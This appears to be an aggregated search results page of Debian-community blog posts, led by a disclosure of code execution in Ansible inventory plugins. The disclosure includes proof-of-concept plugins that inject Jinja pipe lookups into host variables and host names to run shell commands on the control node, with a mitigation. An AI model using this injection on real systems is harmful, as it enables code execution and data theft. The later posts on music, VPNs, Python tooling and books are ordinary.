Search Results: "dsw"

11 March 2024

Evgeni Golov: Remote Code Execution in Ansible dynamic inventory plugins

I had reported this to Ansible a year ago (2023-02-23), but it seems this is considered expected behavior, so I am posting it here now. TL;DR: Don't ever consume any data you got from an inventory if there is a chance somebody untrusted touched it.

Inventory plugins

Inventory plugins allow Ansible to pull inventory data from a variety of sources. The most common ones are probably those fetching instances from clouds like Amazon EC2 and Hetzner Cloud, or those talking to tools like Foreman. For Ansible to function, an inventory needs to tell Ansible how to connect to a host (so e.g. a network address) and which groups the host belongs to (if any). But it can also set any arbitrary variable for that host, which is often used to provide additional information about it. These can be tags in EC2, parameters in Foreman, and other arbitrary data someone thought would be good to attach to that object. And this is where things are getting interesting. Somebody could add a comment to a host, and that comment would be visible to you when you use the inventory with that host. And if that comment contains a Jinja expression, it might get executed. And if that Jinja expression is using the pipe lookup, it might get executed in your shell. Let that sink in for a moment, and then we'll look at an example.

Example inventory plugin
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('exploit.example.com')
        self.inventory.set_variable('exploit.example.com', 'ansible_connection', 'local')
        self.inventory.set_variable('exploit.example.com', 'something_funny', '{{ lookup("pipe", "touch /tmp/hacked" ) }}')
The code is mostly copy & paste from the Developing dynamic inventory docs for Ansible and does three things:
  1. defines the plugin name as evgeni.inventoryrce.inventory
  2. accepts any config that ends with evgeni.yml (we'll need that to trigger the use of this inventory later)
  3. adds an imaginary host exploit.example.com with local connection type and something_funny variable to the inventory
In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc. But the structure of the code would be very similar. The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.

Using the example inventory plugin

Now we install the collection containing this inventory plugin, or rather write the code to ~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py (or wherever your Ansible loads its collections from). And we create a configuration file. As there is nothing to configure, it can be empty and only needs to have the right filename: touch inventory.evgeni.yml is all you need. If we now call ansible-inventory, we'll see our host and our variable present:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-inventory -i inventory.evgeni.yml --list
 
    "_meta":  
        "hostvars":  
            "exploit.example.com":  
                "ansible_connection": "local",
                "something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
             
         
     ,
    "all":  
        "children": [
            "ungrouped"
        ]
     ,
    "ungrouped":  
        "hosts": [
            "exploit.example.com"
        ]
     
 
(ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory is required to allow the use of our inventory plugin, as it's not in the default list.) So far, nothing dangerous has happened. The inventory got generated, the host is present, the funny variable is set, but it's still only a string.

Executing a playbook, interpreting Jinja

To execute the code we'd need to use the variable in a context where Jinja is used. This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM. Or a debug task where you dump all variables of a host to analyze what's set. Let's use that!
- hosts: all
  tasks:
    - name: Display all variables/facts known for a host
      ansible.builtin.debug:
        var: hostvars[inventory_hostname]
This playbook looks totally innocent: run against all hosts and dump their hostvars using debug. No mention of our funny variable. Yet, when we execute it, we see:
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
ok: [exploit.example.com]
TASK [Display all variables/facts known for a host] *******************************************************
ok: [exploit.example.com] => {
    "hostvars[inventory_hostname]": {
        "ansible_all_ipv4_addresses": [
            "192.168.122.1"
        ],
        ...
        "something_funny": ""
    }
}
PLAY RECAP *************************************************************************************************
exploit.example.com  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
We got all variables dumped, that was expected, but now something_funny is an empty string? Jinja got executed, the expression was {{ lookup("pipe", "touch /tmp/hacked" ) }}, and touch does not return anything. But it did create the file!
% ls -alh /tmp/hacked 
-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked
We just "hacked" the Ansible control node (aka: your laptop), as that's where lookup is executed. It could also have used the url lookup to send the contents of your Ansible vault to some internet host. Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/…

Why is this possible?

This happens because set_variable(entity, varname, value) doesn't mark the values as unsafe and Ansible processes everything with Jinja in it. In this very specific example, a possible fix would be to explicitly wrap the string in AnsibleUnsafeText by using wrap_var:
from ansible.utils.unsafe_proxy import wrap_var
 
self.inventory.set_variable('exploit.example.com', 'something_funny', wrap_var('{{ lookup("pipe", "touch /tmp/hacked" ) }}'))
Which then gets rendered as a string when dumping the variables using debug:
"something_funny": "  lookup(\"pipe\", \"touch /tmp/hacked\" )  "
But it seems inventories don't do this:
for k, v in host_vars.items():
    self.inventory.set_variable(name, k, v)
(aws_ec2.py)
for key, value in hostvars.items():
    self.inventory.set_variable(hostname, key, value)
(hcloud.py)
for k, v in hostvars.items():
    try:
        self.inventory.set_variable(host_name, k, v)
    except ValueError as e:
        self.display.warning("Could not set host info hostvar for %s, skipping %s: %s" % (host, k, to_text(e)))
(foreman.py)

And honestly, I can totally understand that. When developing an inventory, you do not expect to handle insecure input data. You also expect the API to handle the data in a secure way by default. But set_variable doesn't allow you to easily tag data as "safe" or "unsafe", and data in Ansible defaults to "safe".

Can something similar happen in other parts of Ansible?

It certainly happened in the past that Jinja was abused in Ansible: CVE-2016-9587, CVE-2017-7466, CVE-2017-7481. But even if we only look at inventories, add_host(host) can be abused in a similar way:
from ansible.plugins.inventory import BaseInventoryPlugin
class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.inventoryrce.inventory'
    def verify_file(self, path):
        valid = False
        if super(InventoryModule, self).verify_file(path):
            if path.endswith('evgeni.yml'):
                valid = True
        return valid
    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        self.inventory.add_host('lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}')
% ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory ansible-playbook -i inventory.evgeni.yml test.yml
PLAY [all] ************************************************************************************************
TASK [Gathering Facts] ************************************************************************************
fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}
PLAY RECAP ************************************************************************************************
lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
% ls -alh /tmp/hacked-host
-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host
Affected versions

I've tried this on Ansible (core) 2.13.13 and 2.16.4. I'd totally expect older versions to be affected too, but I have not verified that.
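Until this changes upstream, an inventory plugin author can defend their users by wrapping everything that comes from the remote source before handing it to Ansible. Here is a minimal sketch of that idea (the plugin name and the host_data structure are made up for illustration, not taken from any real plugin); wrap_var recursively marks strings, dicts and lists as AnsibleUnsafe, so Jinja later renders them as plain text:
from ansible.plugins.inventory import BaseInventoryPlugin
from ansible.utils.unsafe_proxy import wrap_var

class InventoryModule(BaseInventoryPlugin):
    NAME = 'evgeni.safeinventory.inventory'  # hypothetical plugin for this sketch

    def parse(self, inventory, loader, path, cache=True):
        super(InventoryModule, self).parse(inventory, loader, path, cache)
        # Pretend this came from a remote API and may contain
        # attacker-controlled strings (comments, tags, parameters, ...)
        host_data = {
            'exploit.example.com': {
                'something_funny': '{{ lookup("pipe", "touch /tmp/hacked") }}',
            },
        }
        for hostname, hostvars in host_data.items():
            self.inventory.add_host(hostname)
            for key, value in hostvars.items():
                # Wrapping before set_variable keeps Jinja from ever
                # evaluating the value on the control node
                self.inventory.set_variable(hostname, key, wrap_var(value))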

9 January 2024

Louis-Philippe Véronneau: 2023 - A Musical Retrospective

I ended 2022 with a musical retrospective and very much enjoyed writing that blog post. As such, I have decided to do the same for 2023! From now on, this will probably be an annual thing :)

Albums

In 2023, I added 73 new albums to my collection, nearly 3 albums every two weeks! I listed them below in the order in which I acquired them. I purchased most of these albums when I could and borrowed the rest at libraries. If you want to browse through, I added links to the album covers pointing either to websites where you can buy them or to Discogs when digital copies weren't available. Once again this year, it seems that Punk (mostly Oi!) and Metal dominate my list, mostly fueled by Angry Metal Guy and the amazing Montréal Skinhead/Punk concert scene.

Concerts

A trend I started in 2022 was to go to as many concerts of artists I like as possible. I'm happy to report I went to around 80% more concerts in 2023 than in 2022! Looking back at my list, April was quite a busy month... Here are the concerts I went to in 2023: Although metalfinder continues to work as intended, I'm very glad to have discovered the Montréal underground scene has departed from Facebook/Instagram and adopted en masse Gancio, a FOSS community agenda that supports ActivityPub. Our local instance, askapunk.net, is pretty much all I could ask for :) That's it for 2023!

31 March 2023

Enrico Zini: Things I learnt in March 2023

About JACK and Debian

28 October 2022

Antoine Beaupré: Debating VPN options

In my home lab(s), I have a handful of machines spread around a few points of presence, with mostly residential/commercial cable/DSL uplinks, which means, generally, NAT. This makes monitoring those devices kind of impossible. While I do punch holes for SSH, using jump hosts gets old quick, so I'm considering adding a virtual private network (a "VPN", not a VPN service) so that all machines can be reachable from everywhere. I see three ways this can work:
  1. a home-made Wireguard VPN, deployed with Puppet
  2. a Wireguard VPN overlay, with Tailscale or equivalent
  3. IPv6, native or with tunnels
So which one will it be?

Wireguard Puppet modules

As is (unfortunately) typical with Puppet, I found multiple different modules to talk with Wireguard.
module    | score | downloads | release    | stars | watch | forks | license  | docs | contrib | issue | PR   | notes
halyard   | 3.1   | 1,807     | 2022-10-14 | 0     | 0     | 0     | MIT      | no   |         |       |      | requires firewall and Configvault_Write modules?
voxpupuli | 5.0   | 4,201     | 2022-10-01 | 2     | 23    | 7     | AGPLv3   | good | 1/9     | 1/4   | 1/61 | optionally configures ferm, uses systemd-networkd, recommends systemd module with manage_systemd to true, purges unknown keys
abaranov  | 4.7   | 17,017    | 2021-08-20 | 9     | 3     | 38    | MIT      | okay | 1/17    | 4/7   | 4/28 | requires pre-generated private keys
arrnorets | 3.1   | 16,646    | 2020-12-28 | 1     | 2     | 1     | Apache-2 | okay | 1       | 0     | 0    | requires pre-generated private keys?
The voxpupuli module seems to be the most promising. The abaranov module is more popular and has more contributors, but it has more open issues and PRs. More critically, the voxpupuli module was written after the abaranov author didn't respond to a PR from the voxpupuli author trying to add more automation (namely private key management). It looks like setting up a wireguard network would be as simple as this on node A:
wireguard::interface { 'wg0':
  source_addresses => ['2003:4f8:c17:4cf::1', '149.9.255.4'],
  public_key       => $facts['wireguard_pubkeys']['nodeB'],
  endpoint         => 'nodeB.example.com:53668',
  addresses        => [{'Address' => '192.168.123.6/30',}, {'Address' => 'fe80::beef:1/64'},],
}
This configuration comes from this pull request I sent to the module to document how to use that fact. Note that the addresses used here are examples that shouldn't be reused and do not conform to RFC5737 ("IPv4 Address Blocks Reserved for Documentation", 192.0.2.0/24 (TEST-NET-1), 198.51.100.0/24 (TEST-NET-2), and 203.0.113.0/24 (TEST-NET-3)) or RFC3849 ("IPv6 Address Prefix Reserved for Documentation", 2001:DB8::/32), but that's another story. (To avoid bootstrapping problems, the resubmit-facts configuration could be used so that other nodes' facts are more immediately available.) One problem with the above approach is that you explicitly need to take care of routing, network topology, and addressing. This can get complicated quickly, especially if you have lots of devices, behind NAT, in multiple locations (which is basically my life at home, unfortunately). Concretely, basic Wireguard only supports one peer behind NAT. There are some workarounds for this, but they generally imply a relay server of some sort, or some custom registry; it's kind of a mess. And this is where overlay networks like Tailscale come in.

Tailscale

Tailscale is basically designed to deal with this problem. It's not fully opensource, but pretty close, and they have an interesting philosophy behind that. The client is opensource, and there is an opensource version of the server side, called headscale. They have recently (late 2022) hired the main headscale developer while promising to keep supporting it, which is pretty amazing. Tailscale provides an overlay network based on Wireguard, where each peer basically has a peer-to-peer encrypted connection, with automatic key rotation. They also ship a multitude of applications and features on top of that, like file sharing, keyless SSH access, and so on. The authentication layer is based on an existing SSO provider: you don't just register with Tailscale with a new account, you log in with Google, Microsoft, or GitHub (which, really, is still Microsoft). The Headscale server ships with many features out of the box:
  • Full "base" support of Tailscale's features
  • Configurable DNS
    • Split DNS
    • MagicDNS (each user gets a name)
  • Node registration
    • Single-Sign-On (via Open ID Connect)
    • Pre authenticated key
  • Taildrop (File Sharing)
  • Access control lists
  • Support for multiple IP ranges in the tailnet
  • Dual stack (IPv4 and IPv6)
  • Routing advertising (including exit nodes)
  • Ephemeral nodes
  • Embedded DERP server (AKA NAT-to-NAT traversal)
Neither project (client or server) is in Debian (RFP 972439 for the client, none filed yet for the server), which makes deploying this for my use case rather problematic. Their install instructions are basically a curl | bash, but they also provide packages for various platforms. Their Debian install instructions are surprisingly good, and check most of the third-party checklist we're trying to establish. (It's missing a pin.) There's also a Puppet module for tailscale, naturally. What I find a little disturbing with Tailscale is that you not only need to trust Tailscale with authorizing your devices, you also basically delegate that trust to the SSO provider. So, in my case, GitHub (or anyone who compromises my account there) can penetrate the VPN. A little scary. Tailscale is also kind of an "all or nothing" thing. They have MagicDNS, file transfers, all sorts of things, but those things require you to hook up your resolver with Tailscale. In fact, Tailscale kind of assumes you will use their nameservers, and has gone to great lengths to figure out how to do that. And naturally, here, it doesn't seem to work reliably; my resolv.conf somehow gets replaced and the magic resolution of the ts.net domain fails. (I wonder why we can't opt in to just publicly resolve the ts.net domain. I don't care if someone can enumerate the private IP addresses or machines in use in my VPN, at least not as much as I care about fighting with resolv.conf everywhere.) Because I mostly have access to the routers on the networks I'm on, I don't think I'll be using tailscale in the long term. But it's pretty impressive stuff: in the time it took me to even review the Puppet modules to configure Wireguard (which is what I'll probably end up doing), I was up and running with Tailscale (but with a broken DNS, naturally). (And yes, basic Wireguard won't bring me DNS either, but at least I won't have to trust Tailscale's Debian packages, and Tailscale, and Microsoft, and GitHub with this thing.)

IPv6

IPv6 is actually what is supposed to solve this. Not NAT and port forwarding crap, just real IPs everywhere. The problem is: even though IPv6 adoption is still growing, it's kind of reaching a plateau at around 40% world-wide, with Canada lagging behind at 34%. It doesn't help that major ISPs in Canada (e.g. Bell Canada, Videotron) don't care at all about IPv6 (e.g. Videotron has been in beta since 2011). So we can't rely on those companies to do the right thing here. The typical solution here is often to use a tunnel like HE's tunnelbroker.net. It's kind of tricky to configure, but once it's done, it works. You get end-to-end connectivity as long as everyone on the network is on IPv6. And that's really where the problem lies: the second one of your nodes can't set up such a tunnel, you're kind of stuck and that tool completely breaks down. IPv6 tunnels also don't give you the kind of security a VPN provides, naturally. The other downside of a tunnel is that you don't really get peer-to-peer connectivity: you go through the tunnel. So you can expect higher latencies and possibly lower bandwidth as well. Also, HE.net doesn't currently charge for this service (and they've been doing this for a long time), but this could change in the future (just like Tailscale, that said). Concretely, the latency difference is rather minimal. Google:
--- ipv6.l.google.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 136,8ms
RTT[ms]: min = 13, median = 14, p(90) = 14, max = 15
--- google.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 136,0ms
RTT[ms]: min = 13, median = 13, p(90) = 14, max = 14
In the case of GitHub, latency is actually lower, interestingly:
--- ipv6.github.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 134,6ms
RTT[ms]: min = 13, median = 13, p(90) = 14, max = 14
--- github.com ping statistics ---
10 packets transmitted, 10 received, 0,00% packet loss, time 293,1ms
RTT[ms]: min = 29, median = 29, p(90) = 29, max = 30
That is because HE.net peers directly with my ISP and Fastly (which is behind GitHub.com's IPv6, apparently?), so it's only 6 hops away. While over IPv4, the ping goes over New York, before landing in AWS's Ashburn, Virginia datacenters, for a whopping 13 hops... I managed to set up a HE.net tunnel at home, because I also need IPv6 for other reasons (namely debugging at work). My first attempt at setting this up in the office failed, but now that I found the openwrt.org guide, it worked... for a while, and I was able to produce the above, encouraging, mini benchmarks. Unfortunately, a few minutes later, IPv6 just went down again. And the problem with that is that many programs (and especially OpenSSH) do not respect the Happy Eyeballs protocol (RFC 8305), which means various mysterious "hangs" at random times on random applications. It's kind of a terrible user experience, on top of breaking the one thing it's supposed to do, of course, which is to give me transparent access to all the nodes I maintain. Even worse, it would still be a problem for other remote nodes I might set up where I might not have access to the router to set up the tunnel. It's also not absolutely clear what happens if you set up the same tunnel in two places... Presumably, something is smart enough to distribute only a part of the /48 block selectively, but I don't really feel like going that far, considering how flaky the setup is already.

Other options

If this post sounds a little biased towards IPv6 and Wireguard, it's because it is. I would like everyone to migrate to IPv6 already, and Wireguard seems like a simple and sound system. I'm aware of many other options to make VPNs. So before anyone jumps in and says "but what about...", do know that I have personally experimented with:
  • tinc: nice, automatic meshing, used for the Montreal mesh, serious design flaws in the crypto that make it generally unsafe to use; supposedly, v1.1 (or 2.0?) will fix this, but that's been promised for over a decade by now
  • ipsec, specifically strongswan: hard to configure (especially configure correctly!), harder even to debug, otherwise really nice because transparent (e.g. no need for special subnets), used at work, but also considering a replacement there because it's a major barrier to entry to train new staff
  • OpenVPN: mostly used as a client for VPN services like Riseup VPN or Mullvad, mostly relevant for client-server configurations, not really peer-to-peer, shared secrets or TLS, kind of a hassle to maintain, see also SoftEther for an alternative implementation
All of those solutions have significant problems and I do not wish to use any of those for this project. Also note that Tailscale is only one of many projects laid over Wireguard to do that kind of thing, see this LWN review for others (basically NetBird, Firezone, and Netmaker).

Future work

Those are options that came up after writing this post, and might warrant further examination in the future.
  • Meshbird, a "distributed private networking" with little information about how it actually works other than "encrypted with strong AES-256"
  • Nebula, "A scalable overlay networking tool with a focus on performance, simplicity and security", written by Slack people to replace IPsec, docs, runs as an overlay for Slack's 50k node network, only packaged in Debian experimental, lagging behind upstream (1.4.0, from May 2021 vs upstream's 1.6.1 from September 2022), requires a central CA, Golang, I'm in "wait and see" mode for now
  • n2n: "layer two VPN", seems packaged in Debian but inactive
  • ouroboros: "peer-to-peer packet network prototype", sounds and seems complicated
  • QuickTUN is interesting because it's just a small wrapper around NaCL, and it's in Debian... but maybe too obscure for my own good
  • unetd: Wireguard-based full mesh networking from OpenWRT, not in Debian
  • vpncloud: "high performance peer-to-peer mesh VPN over UDP supporting strong encryption, NAT traversal and a simple configuration", sounds interesting, not in Debian
  • Yggdrasil: actually a pretty good match for my use case, but I didn't think of it when starting the experiments here; packaged in Debian, with the Golang version planned, Puppet module; major caveat: nodes exposed publicly inside the global mesh unless configured otherwise (firewall suggested), requires port forwards, alpha status

Conclusion

Right now, I'm going to deploy Wireguard tunnels with Puppet. It seems like kind of a pain in the back, but it's something I will be able to reuse for work, possibly completely replacing strongswan. I have another Puppet module for IPsec which I was planning to publish, but now I'm thinking I should just abort that and replace everything with Wireguard, assuming we still need VPNs at work in the future. (I have a number of reasons to believe we might not need any in the near future anyways...)

22 October 2021

Enrico Zini: Scanning for imports in Python scripts

I had to package a nontrivial Python codebase, and I needed to put dependencies in setup.py. I could do git grep -h import | sort -u, then review the output by hand, but I lacked the motivation for it. Much better to take a stab at solving the general problem. The result is at https://github.com/spanezz/python-devel-tools. One fun part is scanning a directory tree, using ast to find import statements scattered around the code:
import ast
import logging
import os
import re
import stat
from typing import Set, TextIO

log = logging.getLogger()
# Not shown in the post: a regex matching "#!/usr/bin/python3"-style shebangs
re_python_shebang = re.compile(r"^#!.*\bpython")

class Scanner:
    def __init__(self):
        self.names: Set[str] = set()

    def scan_dir(self, root: str):
        for dirpath, dirnames, filenames, dir_fd in os.fwalk(root):
            for fn in filenames:
                # Scan .py files by extension
                if fn.endswith(".py"):
                    with dirfd_open(fn, dir_fd=dir_fd) as fd:
                        self.scan_file(fd, os.path.join(dirpath, fn))
                # Also scan executable scripts with a python shebang
                st = os.stat(fn, dir_fd=dir_fd)
                if st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
                    with dirfd_open(fn, dir_fd=dir_fd) as fd:
                        try:
                            lead = fd.readline()
                        except UnicodeDecodeError:
                            continue
                        if re_python_shebang.match(lead):
                            fd.seek(0)
                            self.scan_file(fd, os.path.join(dirpath, fn))

    def scan_file(self, fd: TextIO, pathname: str):
        log.info("Reading file %s", pathname)
        try:
            tree = ast.parse(fd.read(), pathname)
        except SyntaxError as e:
            log.warning("%s: file cannot be parsed", pathname, exc_info=e)
            return
        self.scan_tree(tree)

    def scan_tree(self, tree: ast.AST):
        for stm in tree.body:
            if isinstance(stm, ast.Import):
                for alias in stm.names:
                    if not isinstance(alias.name, str):
                        print("NAME", repr(alias.name), stm)
                    self.names.add(alias.name)
            elif isinstance(stm, ast.ImportFrom):
                if stm.module is not None:
                    self.names.add(stm.module)
            elif hasattr(stm, "body"):
                self.scan_tree(stm)
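The dirfd_open helper used above comes from Enrico's codebase and its definition is not shown in the post. A minimal stand-in, assuming it simply opens a path relative to the directory file descriptor that os.fwalk() provides, could be:
import os

def dirfd_open(name, dir_fd=None):
    # Open a path relative to a directory file descriptor, so the scan
    # does not depend on the current working directory
    return open(name, opener=lambda p, flags: os.open(p, flags, dir_fd=dir_fd))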
Another fun part is grouping the imported module names by where in sys.path they have been found:
    scanner = Scanner()
    scanner.scan_dir(args.dir)
    sys.path.append(args.dir)
    by_sys_path: Dict[str, List[str]] = collections.defaultdict(list)
    for name in sorted(scanner.names):
        spec = importlib.util.find_spec(name)
        if spec is None or spec.origin is None:
            by_sys_path[""].append(name)
        else:
            for sp in sys.path:
                if spec.origin.startswith(sp):
                    by_sys_path[sp].append(name)
                    break
            else:
                by_sys_path[spec.origin].append(name)
    for sys_path, names in sorted(by_sys_path.items()):
        print(f" sys_path or 'unidentified' :")
        for name in names:
            print(f"   name ")
An example. It's kind of nice how it can at least tell apart stdlib modules so one doesn't need to read through those:
$ ./scan-imports ~/himblick
unidentified:
  changemonitor
  chroot
  cmdline
  mediadir
  player
  server
  settings
  static
  syncer
  utils
~/himblick:
  himblib.cmdline
  himblib.host_setup
  himblib.player
  himblib.sd
/usr/lib/python3.9:
  __future__
  argparse
  asyncio
  collections
  configparser
  contextlib
  datetime
  io
  json
  logging
  mimetypes
  os
  pathlib
  re
  secrets
  shlex
  shutil
  signal
  subprocess
  tempfile
  textwrap
  typing
/usr/lib/python3/dist-packages:
  asyncssh
  parted
  progressbar
  pyinotify
  setuptools
  tornado
  tornado.escape
  tornado.httpserver
  tornado.ioloop
  tornado.netutil
  tornado.web
  tornado.websocket
  yaml
built-in:
  sys
  time
Maybe such a tool already exists and works much better than this? From a quick search I didn't find it, and it was fun to (re)invent it. Updates: Jakub Wilk pointed out an old python-modules script that finds Debian dependencies. The AST scanning code should be refactored to use ast.NodeVisitor.
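For what it's worth, such a refactor could look roughly like this (my sketch of the suggested direction, not Enrico's code); ast.NodeVisitor dispatches visit_* methods by node type and generic_visit() recurses into child nodes, so nested and conditional imports are found without the hasattr(stm, "body") trick:
import ast
from typing import Set

class ImportVisitor(ast.NodeVisitor):
    # Collect imported module names from a parsed tree
    def __init__(self) -> None:
        self.names: Set[str] = set()

    def visit_Import(self, node: ast.Import) -> None:
        for alias in node.names:
            self.names.add(alias.name)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module is not None:
            self.names.add(node.module)

A Scanner.scan_tree replacement would then be three lines: create an ImportVisitor, call visitor.visit(tree), and merge visitor.names into self.names.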

23 July 2021

Bits from Debian: New Debian Developers and Maintainers (May and June 2021)

The following contributors got their Debian Developer accounts in the last two months: The following contributors were added as Debian Maintainers in the last two months: Congratulations!

6 November 2017

Jonathan Dowland: Coil

Peter Christopherson and Jhonn Balance, from Santa Sangre (https://santasangremagazine.wordpress.com/2014/11/16/the-angelic-conversation-in-remembrance-of-coil/)
A friend asked me to suggest five tracks by Coil that gave an introduction to their work. Trying to summarize Coil in 5 tracks is tough. I think it's probably impossible to fairly summarize Coil with any subset of their music, for two reasons. Firstly, their music was the output of their work, but I don't think it is really the whole of the work itself. There's a real mystique around them. They were deeply interested in arcana, old magic, Aleister Crowley, scatology; they were both openly and happily gay and their work sometimes explored their experiences in various related underground scenes and sub-cultures; they lost friends to HIV/AIDS and that had a profound impact on them. They had a big influence on some people who discovered them who were exploring their own sexualities at the time and might have felt excluded from mainstream society. They frequently explored drugs, meditation and other ways to try to expand and open their minds; occultism. They were also fiercely anti-commercial, their stuff was released in limited quantities across a multitude of different music labels, often under different names, and often paired with odd physical objects, runes, vials of blood, etc. Later fascinations included paganism and moon worship. I read somewhere that they literally cursed one of their albums. Secondly, part of their "signature" was the lack of any consistency in their work, or to put it another way, their style over time varied enormously. I'm also not necessarily well-versed in all their stuff, I'm part way on this journey myself... but these are tracks which stand out at least from the subset I've listened to. Both original/core members of Coil have passed away and the legal status of their catalogue is in a state of limbo. Some of these songs are available on currently-in-print releases, but all such releases are under dispute by some associate or other.

1. Heaven's Blade

Like (probably) a lot of Coil songs, this one exists in multiple forms, with some dispute about which are canonical, which are officially sanctioned, etc. The video linked above actually contains 5 different versions, but I've linked to a time offset to the 4th: "Heaven's Blade (Backwards)". This version was the last to come to light with the recent release of "Backwards", an album originally prepared in the 90s at Trent Reznor's Nothing Studios in New Orleans, but not finished or released. The circumstances around its present-day release, as well as who did what to it and what manipulation may have been performed to the audio a long time after the two core members had passed, is a current topic in fan circles. Despite that, this is my preferred version. You can choose to investigate the others, or not, at your own discretion.

2. how to destroy angels (ritual music for the accumulation of male sexual energy)

A few years ago, "guidopaparazzi", a user at the Echoing the Sound music message board, attempted to listen to every Coil release ever made and document the process. He didn't do it chronologically, leaving the EPs until near the end, which is when he tackled this one (which was the first release by Coil, and was the inspiration behind the naming of Trent Reznor's one-time side project "How To Destroy Angels"). Guido seemed to think this was some kind of elaborate joke. Personally I think it's a serious piece and there's something to it, but this just goes to show, different people can take things in entirely different ways. Here's Guido's review, and you can find the rest of his reviews linked from that one if you wish. https://archive.org/details/Coil-HowToDestroyAngels1984

3. Red Birds Will Fly Out Of The East And Destroy Paris In A Night

Both "Musick To Play In The Dark" volumes (one and two) are generally regarded as amongst the most accessible entry points to the Coil discography. This is my choice of cut from volume 1. For some reason this reminds me a little of some of the background music from the game "Unreal Tournament". I haven't played that in at least 15 years. I should go back and see if I can figure out why it does. The whole EP is worth a listen, especially at night. https://archive.org/details/CoilMusickToPlayInTheDarkVol1/Coil+-+Musick+To+Play+In+The+Dark+Vol+1+-+2+Red+Birds+Will+Fly+Out+Of+The+East+And+Destroy+Paris+In+A+Night.flac

4. Things Happen

It's tricky to pick a track from either "Love's Secret Domain" or "Horse Rotorvator"; there are other choices which I think are better known and loved than this one, but it's one that haunted me after I first heard it for one reason or another, so here it is.

5. The Anal Staircase

Track 1 from Horse Rotorvator. What the heck is a Horse Rotorvator anyway? I think it was supposed to have been a lucid nightmare experienced by the vocalist Jhonn Balance. So here they wrote a song about anal sex. No messing about, no allusion particularly, but why should there be? https://archive.org/details/CoilHorseRotorvator2001Remaster/Coil+-+Horse+Rotorvator+%5B2001+remaster%5D+-+01+The+Anal+Staircase.flac

Bonus 6th: 7-Methoxy-B-Carboline (Telepathine)

From the drone album "Time Machines", which has just been re-issued by DIAS records, who describe it as "authorized". Each track is titled by the specific combination of compounds that inspired its composition, supposedly. Or, perhaps it's a "recommended dosing" for listening along. https://archive.org/details/TimeMachines-TimeMachines

Post-script

If those piqued your interest, there are some decent words and a list of album suggestions in this Vinyl Factory article. Finally, if you can track them down, Stuart Maconie had two radio shows about Coil on his "Freak Zone" programme. The main show discusses the release of "Backwards", including an interview with collaborator Danny Hyde, who was the main person behind the recent re-issue. The shorter show is entitled John Doran uncoils Coil. Guest John Doran from The Quietus discusses the group and their history, interspersed with Coil tracks and tracks from their contemporaries. Interestingly, they chose a completely different set of 5 tracks to me.

18 September 2017

Russ Allbery: Consolidation haul

My parents are less fond than I am of filling every available wall in their house with bookshelves and did a pruning of their books. A lot of them duplicated other things that I had, or didn't sound interesting, but I still ended up with two boxes of books (and now have to decide which of my books to prune, since I'm out of shelf space). Also included is the regular accumulation of new ebook purchases.

Mitch Albom Tuesdays with Morrie (nonfiction)
Ilona Andrews Clean Sweep (sff)
Catherine Asaro Charmed Sphere (sff)
Isaac Asimov The Caves of Steel (sff)
Isaac Asimov The Naked Sun (sff)
Marie Brennan Dice Tales (nonfiction)
Captain Eric "Winkle" Brown Wings on My Sleeve (nonfiction)
Brian Christian & Tom Griffiths Algorithms to Live By (nonfiction)
Tom Clancy The Cardinal of the Kremlin (thriller)
Tom Clancy The Hunt for Red October (thriller)
Tom Clancy Red Storm Rising (thriller)
April Daniels Sovereign (sff)
Tom Flynn Galactic Rapture (sff)
Neil Gaiman American Gods (sff)
Gary J. Hudson They Had to Go Out (nonfiction)
Catherine Ryan Hyde Pay It Forward (mainstream)
John Irving A Prayer for Owen Meany (mainstream)
John Irving The Cider House Rules (mainstream)
John Irving The Hotel New Hampshire (mainstream)
Lawrence M. Krauss Beyond Star Trek (nonfiction)
Lawrence M. Krauss The Physics of Star Trek (nonfiction)
Ursula K. Le Guin Four Ways to Forgiveness (sff collection)
Ursula K. Le Guin Words Are My Matter (nonfiction)
Richard Matheson Somewhere in Time (sff)
Larry Niven Limits (sff collection)
Larry Niven The Long ARM of Gil Hamilton (sff collection)
Larry Niven The Magic Goes Away (sff)
Larry Niven Protector (sff)
Larry Niven World of Ptavvs (sff)
Larry Niven & Jerry Pournelle The Gripping Hand (sff)
Larry Niven & Jerry Pournelle Inferno (sff)
Larry Niven & Jerry Pournelle The Mote in God's Eye (sff)
Flann O'Brien The Best of Myles (nonfiction)
Jerry Pournelle Exiles to Glory (sff)
Jerry Pournelle The Mercenary (sff)
